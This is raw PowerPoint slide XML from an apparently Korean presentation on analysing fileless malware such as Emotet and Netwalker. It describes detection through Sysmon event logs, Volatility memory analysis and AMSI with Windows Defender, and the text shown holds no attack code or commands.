        <p:spPr>
          <a:xfrm>
            <a:off x="4945713" y="7475816"/>
            <a:ext cx="381000" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1A3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A8FBEAE-0B87-4EDC-9E94-AB344AFA9500}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8682427" y="7475816"/>
            <a:ext cx="381000" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1A3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27997B85-9214-4ECF-B6FE-ECC492EC2A10}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12419141" y="7475816"/>
            <a:ext cx="381000" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1A3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454068-765A-4337-9D5A-1FDA362A60AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="704227" y="3449448"/>
            <a:ext cx="16974932" cy="1313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Fileless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악성코드를 이벤트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메모리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실시간 탐지의 관점에서 분석한다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Fileless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악성코드의 분석 결과를 근거로 하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-K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Fileless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공격으로 의심스러운 행위를 탐지하는 툴을 개발한다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8849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A0D7611-0582-469A-9A00-68AD82AA08C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1840164" y="5143500"/>
            <a:ext cx="8218235" cy="1354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kern="0" spc="-100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F94858"/>
                </a:solidFill>
                <a:latin typeface="에스코어 드림 6 Bold" panose="020B0703030302020204" pitchFamily="34" charset="-127"/>
                <a:ea typeface="에스코어 드림 4 Regular"/>
                <a:cs typeface="에스코어 드림 6" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Fileless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4800" kern="0" spc="-100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F94858"/>
                </a:solidFill>
                <a:latin typeface="에스코어 드림 6 Bold" panose="020B0703030302020204" pitchFamily="34" charset="-127"/>
                <a:ea typeface="에스코어 드림 4 Regular"/>
                <a:cs typeface="에스코어 드림 6" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Malware</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR" sz="4800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="-100" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="F94858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4 Regular"/>
                <a:cs typeface="에스코어 드림 6" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Analysis</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="그림 17" descr="그리기이(가) 표시된 사진&#10;&#10;자동 생성된 설명">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB93BED6-7CE1-4577-8606-1A01E26AA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274" y="5143500"/>
            <a:ext cx="3159561" cy="3323859"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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CA9C7D8-470B-478B-9CAB-C6CFB2E3F145}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="-196646" y="-36873"/>
            <a:ext cx="12954001" cy="2208572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613C1696-8B8B-4CDA-AA74-0FB8F171F463}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="-196646" y="-38100"/>
            <a:ext cx="12617245" cy="1143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860A0AA9-5987-4552-8CE6-32965FF77F40}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="-196645" y="-38100"/>
            <a:ext cx="12649200" cy="420329"/>
          </a:xfrm>
          <a:prstGeom prst="rtTriangle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3627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227" y="979321"/>
            <a:ext cx="95360" cy="576160"/>
            <a:chOff x="855847" y="930687"/>
            <a:chExt cx="95360" cy="576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90600" y="876300"/>
            <a:ext cx="10287000" cy="10056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5400" kern="0" spc="-200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>Fileless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="5400" kern="0" spc="-200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="5400" kern="0" spc="-200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>악성코드 분석</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              <a:ea typeface="THERodongSinmun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BD0F63A-0553-4FB7-BFDE-A6BB8A8A3D04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9889960" y="6166380"/>
            <a:ext cx="3048000" cy="12954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94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ysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Event Analysis</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000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C5C950B-3895-4A0D-BB0C-45F8DCF26154}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9889960" y="7636140"/>
            <a:ext cx="3048000" cy="12954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94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ysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Memory Analysis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ABFAF28-3BEF-4526-B405-AA5EBF28D6D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3505200" y="6988440"/>
            <a:ext cx="3048000" cy="12954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94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ysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Real-time Detect</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="00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19FC33-323F-4B2D-A5DF-8F126CB74D58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2667001" y="3516443"/>
            <a:ext cx="2057398" cy="1600198"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F3F3F3"/>
          </a:solidFill>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="1A30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악성코드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유입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F92713-404D-4653-9B92-B26D19772B32}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8610600" y="3516443"/>
            <a:ext cx="1752600" cy="1600198"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F3F3F3"/>
          </a:solidFill>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="1A30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>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>감염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EDA1CE-5C14-45B3-B577-4FD9ACA043B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11049000" y="3516443"/>
            <a:ext cx="6248400" cy="1600198"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F3F3F3"/>
          </a:solidFill>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="1A30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지속성 생성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2B02070-E0EB-47A8-9392-829D765B2428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>
            <a:off x="4724399" y="4316542"/>
            <a:ext cx="3886201" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="1A30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90CE285-A994-4C53-9B2C-961927B38B2A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10363200" y="4316542"/>
            <a:ext cx="685800" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="1A30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D93AD4F-2CC7-491C-B83A-8C03518FB9B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5029200" y="5132782"/>
            <a:ext cx="0" cy="1676400"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="F94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8908AE7-97BD-4154-9DB4-63DFF72BFE42}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="11413960" y="5330153"/>
            <a:ext cx="0" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="F94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F1FF19-BCC5-43EC-BBAD-A0449A838C5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="704227" y="2903594"/>
            <a:ext cx="64746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 err="1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Netwalker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="28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Fallout Exploit Kit, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0" err="1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Emotet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="28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5D4C37-2490-4750-805D-A84A1AF90B68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13258800" y="6398581"/>
            <a:ext cx="38862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‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0" err="1"/>
              <a:t>sysmon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0"/>
              <a:t>’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>행위 분석 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t>+ CML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>분석</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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6513B8-EFCC-4D41-B4E2-6B204E6919F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13258800" y="7868341"/>
            <a:ext cx="38862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‘volatility’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>메모리</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>레지스트리 분석</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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35BA30-AE9C-4EF8-B568-ACDC3B9466E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2667000" y="8457403"/>
            <a:ext cx="47244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/>
              <a:t>‘AMSI + Window Defender’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>악성</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>스크립트 유입 탐지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259281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227" y="979321"/>
            <a:ext cx="95360" cy="576160"/>
            <a:chOff x="855847" y="930687"/>
            <a:chExt cx="95360" cy="576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sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Google Shape;248;p16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF8842D5-EDDE-4F1A-8E5C-366F75211E35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9193153" y="4108682"/>
            <a:ext cx="7719570" cy="304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solidFill>
                  <a:srgbClr val="1A3053"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>오픈소스 기반 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A3053"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>CLI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A3053"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>인터페이스를 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="3200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1A3053"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea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solidFill>
                  <a:srgbClr val="1A3053"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>제공하는 메모리 분석도구</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="3200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1A3053"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea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3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다양하고 사용이 용이한 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="32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Plug-in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="32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을 통해 프로세스 정보와 네트워크 연결정보 등을 확인할 수 있음</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="3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8697A68-DBE6-4591-9901-8BD4119A1630}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10820400" y="2986788"/>
            <a:ext cx="4465074" cy="7620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Volatility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AFAD3022-E64E-4F21-9AC5-25C86E797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0453" y="7965813"/>
            <a:ext cx="8504967" cy="12842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Google Shape;248;p16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE68E3E3-640F-4F4B-98D8-D9E23E8039D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="692195" y="4108682"/>
            <a:ext cx="771957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solidFill>
                  <a:srgbClr val="1A3053"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>시스템 활동을 모니터하고 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A3053"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>로깅되는</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A3053"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> 이벤트를 살펴볼 수 있는 도구</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="3200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1A3053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0F3EB1-A8F0-4A38-BA10-D3C1268F1476}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2319442" y="2986788"/>
            <a:ext cx="4465074" cy="7620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err="1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sysmon</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="ko-KR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BE14CCB8-884D-4A61-93FD-DF07401484A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="876300"/>
            <a:ext cx="10287000" cy="10056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5400" kern="0" spc="-200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>Fileless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="5400" kern="0" spc="-200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="5400" kern="0" spc="-200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>악성코드 분석</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="_x364000896">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E619A96-A8EA-4209-A06C-D2506B97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644" y="5710686"/>
            <a:ext cx="7328669" cy="353939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490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227" y="979321"/>
            <a:ext cx="95360" cy="576160"/>
            <a:chOff x="855847" y="930687"/>
            <a:chExt cx="95360" cy="576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A029FF7-9033-4A35-A72D-54699804FDD8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="4711022"/>
            <a:ext cx="16078200" cy="2767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dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>응용 프로그램 및 서비스를 컴퓨터에 있는 모든 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" kern="0" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Anti-Virus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" kern="0" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>제품과 통합 할 수 있는 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2800" kern="0" dirty="0">
              <a:latin typeface="+mn-ea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dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>다목적 인터페이스 표준</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2800" kern="0" dirty="0">
              <a:latin typeface="+mn-ea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kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F497D"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>파일 및 메모리</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F497D"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F497D"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>스트림 스캔</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F497D"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F497D"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>콘텐츠 소스 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F497D"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>URL/IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F497D"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>확인 및 기타 기술을 허용하는 호출 구조를 지원</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2800" kern="0" spc="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F497D"/>
              </a:solidFill>
              <a:effectLst/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18A360-D732-4FB2-945D-9071BC1F39CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4419600" y="3390900"/>
            <a:ext cx="9067800" cy="7620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Anti Malware Scan Interface(AMSI)</a:t>
            </a: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99DF622-9ABF-4917-8FF0-6D6F991E6F32}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="876300"/>
            <a:ext cx="10287000" cy="10056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5400" kern="0" spc="-200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>Fileless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="5400" kern="0" spc="-200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="5400" kern="0" spc="-200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>악성코드 분석</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              <a:ea typeface="THERodongSinmun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026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에스코어 드림 4 Regular"/>
        <a:cs typeface=""/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Calibri"/>
        <a:ea typeface="에스코어 드림 4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3680</TotalTime>
  <Words>2633</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>사용자 지정</PresentationFormat>
  <Paragraphs>410</Paragraphs>
  <Slides>38</Slides>
  <Notes>36</Notes>
  <HiddenSlides>0</HiddenSlides>
  <MMClips>3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9" baseType="lpstr">
      <vt:lpstr>KoPubWorld돋움체 Medium</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Symbol</vt:lpstr>
      <vt:lpstr>THERodongSinmun</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>맑은 고딕</vt:lpstr>
      <vt:lpstr>에스코어 드림 4 Regular</vt:lpstr>
      <vt:lpstr>에스코어 드림 6 Bold</vt:lpstr>
      <vt:lpstr>함초롬바탕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김지원</cp:lastModifiedBy>
  <cp:revision>124</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-11-19T02:40:51Z</dcterms:created>
